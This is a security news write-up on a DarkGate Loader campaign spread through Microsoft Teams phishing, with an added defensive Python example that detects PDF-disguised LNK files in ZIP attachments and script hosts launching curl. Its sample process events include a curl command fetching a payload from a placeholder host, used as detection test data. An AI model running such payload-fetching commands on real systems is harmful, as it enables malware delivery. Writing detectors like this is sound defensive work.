A new phishing campaign is using Microsoft Teams messages to distribute the DarkGate Loader malware through malicious attachments. DarkGate emerged in 2018 and is a potent malware with multiple capabilities. 

Diving into details

The campaign began in late August when two compromised external Office 365 accounts were found sending phishing messages through Microsoft Teams to various organizations. 
  • These accounts were used to deceive Microsoft Teams users into downloading a ZIP file named "Changes to the vacation schedule." 
  • Clicking on this attachment would initiate the download of the ZIP file from a SharePoint URL; the archive actually contained an LNK file posing as a PDF document.
  • The campaign includes a malicious VBScript that triggers a series of actions leading to the installation of the DarkGate Loader.
  • To avoid detection, the download process employs Windows cURL to retrieve the malware's executable and script files.
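
The delivery chain listed above (a ZIP attachment that hides an LNK behind a PDF-looking name, then a script host calling Windows cURL to fetch the payload) lends itself to two simple defender-side checks. The following is an added example, not code from the Cyware write-up or from any vendor; the archive, the member names and the Sysmon-style process events are constructed for the demo, and the payload URL is a placeholder.

```python
"""Added example (not part of the original write-up): two checks for the
DarkGate Teams delivery chain, an archive attachment carrying an LNK file
posing as a PDF, and a script host launching curl.exe to fetch a payload.
All sample data below is constructed."""
import io
import zipfile
from pathlib import PureWindowsPath

# Shell Link (.LNK) header: HeaderSize 0x4C followed by the LinkCLSID
# 00021401-0000-0000-C000-000000000046 in little-endian GUID byte order.
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")

# Document extensions a lure typically imitates with a double extension.
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt"}

# Interpreters that the campaign's VBScript stage would run under.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}


def inspect_archive(zip_bytes: bytes) -> list[dict]:
    """Return one finding per suspicious member of a ZIP attachment.

    A member is flagged when its content starts with the LNK header (whatever
    its name says), when its extension is .lnk, or when it uses a double
    extension such as .pdf.lnk to look like a document."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            suffixes = [s.lower() for s in PureWindowsPath(info.filename).suffixes]
            with zf.open(info) as member:
                head = member.read(len(LNK_MAGIC))
            reasons = []
            if head == LNK_MAGIC:
                reasons.append("content is a Windows shortcut (LNK header)")
            if suffixes and suffixes[-1] == ".lnk":
                reasons.append("extension .lnk")
            if len(suffixes) >= 2 and suffixes[-2] in DOCUMENT_EXTS:
                reasons.append("double extension " + "".join(suffixes[-2:]))
            if reasons:
                findings.append({"member": info.filename, "reasons": reasons})
    return findings


def detect_curl_fetch(events: list[dict]) -> list[dict]:
    """Flag process-creation events (Sysmon Event ID 1 field names) in which
    a script host spawns curl.exe with a remote URL on its command line."""
    hits = []
    for ev in events:
        image = PureWindowsPath(ev.get("Image", "")).name.lower()
        parent = PureWindowsPath(ev.get("ParentImage", "")).name.lower()
        cmdline = ev.get("CommandLine", "")
        if image == "curl.exe" and parent in SCRIPT_HOSTS and "http" in cmdline.lower():
            hits.append({"pid": ev.get("ProcessId"), "parent": parent, "cmdline": cmdline})
    return hits


def build_sample_zip() -> bytes:
    """Constructed lure archive: a PDF-looking name with LNK content, plus one benign file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Changes to the vacation schedule.pdf.lnk", LNK_MAGIC + b"\x00" * 32)
        zf.writestr("readme.txt", b"benign text")
    return buf.getvalue()


# Constructed process events; the URL is a placeholder, not a real indicator.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'wscript.exe "C:\Users\user\AppData\Local\Temp\stage.vbs"'},
    {"ProcessId": 4188, "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"curl.exe -o C:\Temp\payload.bin http://payload.example/stage.bin"},
    {"ProcessId": 5002, "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "curl.exe --version"},  # no URL: not flagged
]


if __name__ == "__main__":
    for finding in inspect_archive(build_sample_zip()):
        print("archive:", finding)
    for hit in detect_curl_fetch(SAMPLE_EVENTS):
        print("process:", hit)
```

Both checks are deliberately narrow: the archive inspector keys on the LNK header rather than the file name, so a renamed shortcut is still caught, and the process check requires all three conditions (curl.exe, a script-host parent, a URL) to keep noise from ordinary curl use down.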

Where it started

The August malvertising campaign introduced a new version of the DarkGate malware. It was being spread through malicious ads and search engine poisoning. 
  • This DarkGate version incorporates techniques such as obfuscation and encryption to evade detection. 
  • Notably, the DarkGate toolkit can steal user credentials and has been primarily targeting individuals and organizations in Europe.
  • Further capabilities of DarkGate include hVNC for remote access, cryptomining, reverse shell, keylogging, clipboard stealing, and information stealing.

The bottom line

The existing security measures in Microsoft Teams, such as Safe Attachments and Safe Links, were unable to identify or prevent this attack. At the moment, the sole method to thwart this type of attack in Microsoft Teams is to permit chat requests only from particular external domains. However, it's important to note that this approach may have business consequences, as it requires IT administrators to whitelist all trusted external domains.
Cyware Publisher